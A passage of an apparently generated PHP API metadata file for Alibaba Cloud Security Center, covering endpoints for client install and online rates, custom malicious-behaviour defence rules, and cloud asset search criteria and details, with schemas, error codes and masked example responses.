\\"028CF634-5268-5660-9575-48C9ED6B****\\",\\n \\"TimeDimensionStatisticDTO\\": {\\n \\"TimeDimensionStatisticItems\\": [\\n {\\n \\"DataTime\\": 1712592000000,\\n \\"StatisticDatas\\": [\\n {\\n \\"Name\\": \\"COMPLIANCE_Pass\\",\\n \\"Value\\": 194\\n }\\n ]\\n }\\n ],\\n \\"StatisticType\\": \\"CheckPassRate\\",\\n \\"Dates\\": [\\n 0\\n ]\\n }\\n}","type":"json"}]', ], 'GetClientRatioStatistic' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasGC725T'], ], 'parameters' => [ [ 'name' => 'TimeStart', 'in' => 'query', 'schema' => ['description' => 'The timestamp that specifies the beginning of the time range to collect statistics. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1671382800000', 'title' => ''], ], [ 'name' => 'TimeEnd', 'in' => 'query', 'schema' => ['description' => 'The timestamp that specifies the end of the time range to collect statistics. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1686412799999', 'title' => ''], ], [ 'name' => 'StatisticTypes', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'description' => 'An array that consists of the details of a statistical type.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the statistics.'."\n" ."\n" .'* **INSTALL**: installation rate'."\n" .'* **ONLINE**: online rate'."\n", 'type' => 'string', 'required' => false, 'example' => 'INSTALL', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the primary account of the Resource Directory member account.'."\n" .'> call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) interface to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'ClientInstallRatio' => [ 'description' => 'The statistics on the client installation rate.'."\n", 'type' => 'object', 'properties' => [ 'HistoryItems' => [ 'description' => 'The list of historical statistics on the installation rate of the client.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The type of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud'."\n" .'* **1**: a third-party cloud asset'."\n" .'* **2**: an asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a simple application server'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'Items' => [ 'description' => 'The list of statistics on the client installation rate.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'CalculateTime' => ['description' => 'The timestamp of the calculation. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1687759630045', 'title' => ''], 'AssetTotalCount' => ['description' => 'The total number of assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'InstallRatio' => ['description' => 'The installation rate. Unit: %.'."\n", 'type' => 'number', 'format' => 'double', 'example' => '80.00', 'title' => ''], 'InstalledAssetCount' => ['description' => 'The number of assets on which the client is installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'CurrentItems' => [ 'description' => 'The list of current statistics on the installation rate of the client.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The type of the server. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud'."\n" .'* **1**: a third-party cloud asset'."\n" .'* **2**: an asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a lightweight asset'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Items' => [ 'description' => 'The list of the statistics on the installation rate of the client by vendor.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'CalculateTime' => ['description' => 'The timestamp of the calculation. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1687759630045', 'title' => ''], 'AssetTotalCount' => ['description' => 'The total number of assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'InstallRatio' => ['description' => 'The installation rate. Unit: %.'."\n", 'type' => 'number', 'format' => 'double', 'example' => '70.00', 'title' => ''], 'InstalledAssetCount' => ['description' => 'The number of assets on which the client is installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '70', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'ClientOnlineRatio' => [ 'description' => 'The statistics on the client online rate.'."\n", 'type' => 'object', 'properties' => [ 'HistoryItems' => [ 'description' => 'The list of historical statistics on the online rate of the client.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The type of the server. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud'."\n" .'* **1**: a third-party cloud asset'."\n" .'* **2**: an asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a lightweight asset'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '7', 'title' => ''], 'Items' => [ 'description' => 'The list of historical statistics on the online rate of the client by vendor.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'CalculateTime' => ['description' => 'The timestamp of the calculation. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1687759630045', 'title' => ''], 'AssetInstallCount' => ['description' => 'The number of assets on which the client is installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], 'OnlineRatio' => ['description' => 'The online rate. Unit: %.'."\n", 'type' => 'number', 'format' => 'double', 'example' => '40.00', 'title' => ''], 'OnlineAssetCount' => ['description' => 'The number of online assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'CurrentItems' => [ 'description' => 'The list of current statistics on the online rate of the client.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'The type of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud'."\n" .'* **1**: a third-party cloud asset'."\n" .'* **2**: an asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: other cloud asset'."\n" .'* **8**: a simple application server'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'Items' => [ 'description' => 'The list of current statistics on the online rate of the client by vendor.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'CalculateTime' => ['description' => 'The timestamp of the calculation. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1687759630045', 'title' => ''], 'AssetInstallCount' => ['description' => 'The number of assets on which the client is installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], 'OnlineRatio' => ['description' => 'The online rate. Unit: %.'."\n", 'type' => 'number', 'format' => 'double', 'example' => '20.00', 'title' => ''], 'OnlineAssetCount' => ['description' => 'The number of online assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Dates' => [ 'description' => 'The list of time when statistics were collected.'."\n", 'type' => 'array', 'items' => ['description' => 'The time when statistics were collected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1687104000000', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ['errorCode' => 'NeedBuy', 'errorMessage' => 'This service shoule be purchased first.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'GetClientRatioStatistic', 'summary' => 'Queries the installation rate and online rate of the agent.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClientRatioStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClientRatioStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"ClientInstallRatio\\": {\\n \\"HistoryItems\\": [\\n {\\n \\"Vendor\\": 3,\\n \\"Items\\": [\\n {\\n \\"CalculateTime\\": 1687759630045,\\n \\"AssetTotalCount\\": 100,\\n \\"InstallRatio\\": 80,\\n \\"InstalledAssetCount\\": 80\\n }\\n ]\\n }\\n ],\\n \\"CurrentItems\\": [\\n {\\n \\"Vendor\\": 0,\\n \\"Items\\": [\\n {\\n \\"CalculateTime\\": 1687759630045,\\n \\"AssetTotalCount\\": 100,\\n \\"InstallRatio\\": 70,\\n \\"InstalledAssetCount\\": 70\\n }\\n ]\\n }\\n ]\\n },\\n \\"ClientOnlineRatio\\": {\\n \\"HistoryItems\\": [\\n {\\n \\"Vendor\\": 7,\\n \\"Items\\": [\\n {\\n \\"CalculateTime\\": 1687759630045,\\n \\"AssetInstallCount\\": 50,\\n \\"OnlineRatio\\": 40,\\n \\"OnlineAssetCount\\": 20\\n }\\n ]\\n }\\n ],\\n \\"CurrentItems\\": [\\n {\\n \\"Vendor\\": 3,\\n \\"Items\\": [\\n {\\n \\"CalculateTime\\": 1687759630045,\\n \\"AssetInstallCount\\": 50,\\n \\"OnlineRatio\\": 20,\\n \\"OnlineAssetCount\\": 10\\n }\\n ]\\n }\\n ]\\n },\\n \\"Dates\\": [\\n 1687104000000\\n ]\\n}","type":"json"}]', ], 'GetClientUserDefineRule' => [ 'summary' => 'Queries custom rules for malicious behavior defense.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the custom rule.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '200****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****', 'title' => ''], 'UserDefineRuleDetail' => [ 'description' => 'The rule details.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The rule type. Valid values:'."\n" ."\n" .'- **1**: process hash'."\n" .'- **2**: command line'."\n" .'- **3**: process network'."\n" .'- **4**: file read/write'."\n" .'- **5**: registry operation'."\n" .'- **6**: dynamic-link library loading'."\n" .'- **7**: file rename.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ActionType' => ['description' => 'The action type. Valid values:'."\n" ."\n" .'- **0**: added to the whitelist'."\n" .'- **1**: added to the blacklist.', 'type' => 'string', 'example' => '0', 'title' => ''], 'GmtCreate' => ['description' => 'The creation time.', 'type' => 'integer', 'format' => 'int64', 'example' => '167118088****', 'title' => ''], 'Md5List' => ['description' => 'The list of process hashes.', 'type' => 'string', 'example' => '0c9045b5bec90f9825f1f3f64dd4****'."\n", 'title' => ''], 'GmtModified' => ['description' => 'The most recent modification time.', 'type' => 'integer', 'format' => 'int64', 'example' => '167118088****'."\n", 'title' => ''], 'Name' => ['description' => 'The rule name.', 'type' => 'string', 'example' => '规则****', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '200****', 'title' => ''], 'ProcPath' => ['description' => 'The process path.', 'type' => 'string', 'example' => 'c:/windows/system32/i****'."\n", 'title' => ''], 'Cmdline' => ['description' => 'The command line.', 'type' => 'string', 'example' => '/usr/sbin/s****'."\n", 'title' => ''], 'Platform' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **linux**'."\n" .'- **windows**'."\n" .'- **all**.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'IP' => ['description' => 'The IP address.', 'type' => 'string', 'example' => '10.240.XX.XX'."\n", 'title' => ''], 'Port' => ['description' => 'The port number.', 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'FilePath' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/etc/pam****'."\n", 'title' => ''], 'NewFilePath' => ['description' => 'The new file path after the file is renamed.', 'type' => 'string', 'example' => '/etc/pam****'."\n", 'title' => ''], 'RegistryKey' => ['description' => 'The registry key.', 'type' => 'string', 'example' => 'HKEY_DYN_****'."\n", 'title' => ''], 'RegistryContent' => ['description' => 'The registry value.', 'type' => 'string', 'example' => '*SECOH-QAD.exe*'."\n", 'title' => ''], 'ParentProcPath' => ['description' => 'The parent process path.', 'type' => 'string', 'example' => 'c:/windows/system32/i****'."\n", 'title' => ''], 'ParentCmdline' => ['description' => 'The parent command line.', 'type' => 'string', 'example' => '/usr/sbin/s****'."\n", 'title' => ''], 'PortStr' => ['description' => 'The port number. Valid values: 1 to 65535.', 'type' => 'string', 'example' => '80', 'title' => ''], 'Domain' => ['description' => 'The domain name.', 'type' => 'string', 'example' => 'example.com', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidId', 'errorMessage' => 'Invalid ID.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Get client user-defined rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClientUserDefineRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetClientUserDefineRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF4****\\",\\n \\"UserDefineRuleDetail\\": {\\n \\"Type\\": 1,\\n \\"ActionType\\": \\"0\\",\\n \\"GmtCreate\\": 0,\\n \\"Md5List\\": \\"0c9045b5bec90f9825f1f3f64dd4****\\\\n\\",\\n \\"GmtModified\\": 0,\\n \\"Name\\": \\"规则****\\",\\n \\"Id\\": 0,\\n \\"ProcPath\\": \\"c:/windows/system32/i****\\\\n\\",\\n \\"Cmdline\\": \\"/usr/sbin/s****\\\\n\\",\\n \\"Platform\\": \\"linux\\",\\n \\"IP\\": \\"10.240.XX.XX\\\\n\\",\\n \\"Port\\": 22,\\n \\"FilePath\\": \\"/etc/pam****\\\\n\\",\\n \\"NewFilePath\\": \\"/etc/pam****\\\\n\\",\\n \\"RegistryKey\\": \\"HKEY_DYN_****\\\\n\\",\\n \\"RegistryContent\\": \\"*SECOH-QAD.exe*\\\\n\\",\\n \\"ParentProcPath\\": \\"c:/windows/system32/i****\\\\n\\",\\n \\"ParentCmdline\\": \\"/usr/sbin/s****\\\\n\\",\\n \\"PortStr\\": \\"80\\",\\n \\"Domain\\": \\"example.com\\"\\n }\\n}","type":"json"}]', ], 'GetCloudAssetCriteria' => [ 'summary' => 'Queries the filter conditions that are used to search for cloud assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The keyword for fuzzy search when you query the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testwww', 'title' => ''], ], [ 'name' => 'CloudAssetTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of cloud assets.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The type of the cloud asset.'."\n", 'type' => 'object', 'properties' => [ 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'* **0**: Elastic Compute Service (ECS)'."\n" .'* **1**: Server Load Balancer (SLB)'."\n" .'* **3**: ApsaraDB RDS'."\n" .'* **4**: ApsaraDB for MongoDB (MongoDB)'."\n" .'* **5**: ApsaraDB for Redis (Redis)'."\n" .'* **6**: Container Registry'."\n" .'* **8**: Container Service for Kubernetes (ACK)'."\n" .'* **9**: Virtual Private Cloud (VPC)'."\n" .'* **11**: ActionTrail'."\n" .'* **12**: Alibaba Cloud CDN (CDN)'."\n" .'* **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'* **14**: Apsara Devops'."\n" .'* **16**: Anti-DDoS'."\n" .'* **17**: Web Application Firewall (WAF)'."\n" .'* **18**: Object Storage Service (OSS)'."\n" .'* **19**: PolarDB'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL'."\n" .'* **21**: Microservices Engine (MSE)'."\n" .'* **22**: File Storage NAS (NAS)'."\n" .'* **23**: Data Security Center (DSC)'."\n" .'* **24**: Elastic IP Address (EIP)'."\n" .'* **25**: IDaaS EIAM'."\n" .'* **26**: PolarDB-X'."\n" .'* **27**: Elasticsearch', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '9', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service or asset. Valid values:'."\n" ."\n" .'* **0**: ECS'."\n" ."\n" .' * **0**: instance'."\n" .' * **1**: disk (storage)'."\n" .' * **2**: security group'."\n" ."\n" .'* **1**: SLB'."\n" ."\n" .' * **0**: SLB'."\n" .' * **1**: Application Load Balancer (ALB)'."\n" ."\n" .'* **3**: ApsaraDB RDS'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **4**: MongoDB'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **5**: Redis'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **6**: Container Registry'."\n" ."\n" .' * **1**: Enterprise Edition'."\n" .' * **2**: Personal Edition'."\n" ."\n" .'* **8**: ACK'."\n" ."\n" .' * **0**: cluster'."\n" ."\n" .'* **9**: VPC'."\n" ."\n" .' * **0**: NAT gateway'."\n" .' * **1**: Elastic IP address (EIP)'."\n" .' * **2**: VPN'."\n" .' * **3**: VPC Flow Logs'."\n" ."\n" .'* **11**: ActionTrail'."\n" ."\n" .' * **0**: trail'."\n" ."\n" .'* **12**: CDN'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" ."\n" .' * **0**: certificate'."\n" ."\n" .'* **14**: Apsara Devops'."\n" ."\n" .' * **0**: organization'."\n" ."\n" .'* **16**: Anti-DDoS'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **17**: WAF'."\n" ."\n" .' * **0**: domain name'."\n" ."\n" .'* **18**: OSS'."\n" ."\n" .' * **0**: bucket'."\n" ."\n" .'* **19**: PolarDB'."\n" ."\n" .' * **0**: cluster'."\n" ."\n" .'* **20**: ApsaraDB RDS for PostgreSQL'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **21**: MSE'."\n" ."\n" .' * **0**: cluster'."\n" ."\n" .'* **22**: NAS'."\n" ."\n" .' * **0**: file system'."\n" ."\n" .'* **23**: DSC'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **24**: EIP'."\n" ."\n" .' * **0**: Anycast EIP'."\n" ."\n" .'* **25**: IDaaS EIAM'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **26**: PolarDB-X'."\n" ."\n" .' * **0**: instance'."\n" ."\n" .'* **27**: Elasticsearch'."\n" ."\n" .' * **0**: instance'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'CriteriaList' => [ 'description' => 'An array consisting of the information about the filter conditions that are used to search for cloud assets.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the filter condition that is used to search for cloud assets.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the filter condition. Valid values:'."\n" ."\n" .'* **input**: The filter condition needs to be specified.'."\n" .'* **select**: The filter condition is an option that can be selected from the drop-down list.'."\n", 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the filter condition. Valid values:'."\n" ."\n" .'* **instanceId**: the ID of the instance'."\n" .'* **instanceName**: the name of an instance'."\n" .'* **internetIp**: the public IP address'."\n" .'* **riskStatus**: the risk status'."\n" .'* **vendorRegionId**: the region ID by service provider'."\n", 'type' => 'string', 'example' => 'instanceId', 'title' => ''], 'Values' => ['description' => 'The values of the search condition. This parameter is returned only if the value of **Type** is **select**.'."\n" ."\n" .'> If the value of **Type** is **input**, the value of this parameter is an empty string.'."\n", 'type' => 'string', 'example' => 'fvt*', 'title' => ''], 'MultiValues' => ['description' => 'The structured attribute values of the assets that match the keyword. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **vendor**: providers'."\n" .'* **regionIds**: IDs of supported regions'."\n", 'type' => 'string', 'example' => '[{"vendor":0,"regionIds":{"default":["ap-southeast-1","ap-northeast-2","ap-southeast-3","ap-southeast-5","ap-southeast-7","me-central-1"]}},{"vendor":1,"regionIds":{"default":["outside-of-aliyun"]}}]', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"instanceId\\",\\n \\"Values\\": \\"fvt*\\",\\n \\"MultiValues\\": \\"[{\\\\\\"vendor\\\\\\":0,\\\\\\"regionIds\\\\\\":{\\\\\\"default\\\\\\":[\\\\\\"ap-southeast-1\\\\\\",\\\\\\"ap-northeast-2\\\\\\",\\\\\\"ap-southeast-3\\\\\\",\\\\\\"ap-southeast-5\\\\\\",\\\\\\"ap-southeast-7\\\\\\",\\\\\\"me-central-1\\\\\\"]}},{\\\\\\"vendor\\\\\\":1,\\\\\\"regionIds\\\\\\":{\\\\\\"default\\\\\\":[\\\\\\"outside-of-aliyun\\\\\\"]}}]\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'GetCloudAssetCriteria', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCloudAssetCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCloudAssetCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetCloudAssetDetail' => [ 'summary' => 'Obtains the details of cloud assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The service provider of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: Alibaba Cloud.'."\n" .'* **1**: service provider that is unrecognized.'."\n" .'* **2**: data center.'."\n" .'* **3**, **4**, **5**, and **7**: third-party service provider.'."\n" .'* **8**: simple application server.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'docRequired' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['description' => 'The type of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: Elastic Compute Service (ECS).'."\n" .'* **1**: Server Load Balancer (SLB).'."\n" .'* **3**: ApsaraDB RDS.'."\n" .'* **4**: ApsaraDB for MongoDB.'."\n" .'* **5**: ApsaraDB for Redis.'."\n" .'* **6**: Container Registry.'."\n" .'* **8**: Container Service for Kubernetes.'."\n" .'* **9**: Virtual Private Cloud (VPC).'."\n" .'* **11**: ActionTrail.'."\n" .'* **12**: Alibaba Cloud CDN (CDN).'."\n" .'* **13**: Certificate Management Service.'."\n" .'* **14**: Apsara Devops.'."\n" .'* **15**: Resource Access Management (RAM).'."\n" .'* **16**: Anti-DDoS.'."\n" .'* **17**: Web Application Firewall (WAF).'."\n" .'* **18**: Object Storage Service (OSS).'."\n" .'* **19**: PolarDB.'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL.'."\n" .'* **21**: Microservices Engine (MSE).'."\n" .'* **22**: File Storage NAS (NAS).'."\n" .'* **23**: Data Security Center (DSC).'."\n" .'* **24**: Elastic IP Address (EIP).'."\n" .'* **25**: Identity as a Service (IDaaS)-Employee Identity and Access Management (EIAM).'."\n" .'* **26**: PolarDB-X.'."\n" .'* **27**: Elasticsearch.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'docRequired' => true, 'example' => '14', 'title' => ''], ], [ 'name' => 'AssetSubType', 'in' => 'query', 'schema' => ['description' => 'The subtype of the cloud service.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'docRequired' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'CloudAssetInstances', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The details of the assets.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the asset.'."\n", 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region in which the cloud asset resides.'."\n" ."\n" .'> For more information about the mapping between region IDs and region names, see [Regions and zones](~~40654~~).'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the cloud asset.'."\n", 'type' => 'string', 'required' => true, 'docRequired' => true, 'example' => 'sg-wz9hf86vbzbrrde7****', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'CB45CAED-31C3-517A-8619-10F632D3****', 'title' => ''], 'Instances' => [ 'description' => 'An array that consists of the details of the cloud assets.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the cloud asset.'."\n", 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region in which the cloud asset resides.'."\n" ."\n" .'> For more information about the mapping between region IDs and region names, see [Regions and zones](~~40654~~).'."\n", 'type' => 'string', 'example' => 'cn-hanghzou', 'title' => ''], 'Vendor' => ['description' => 'The 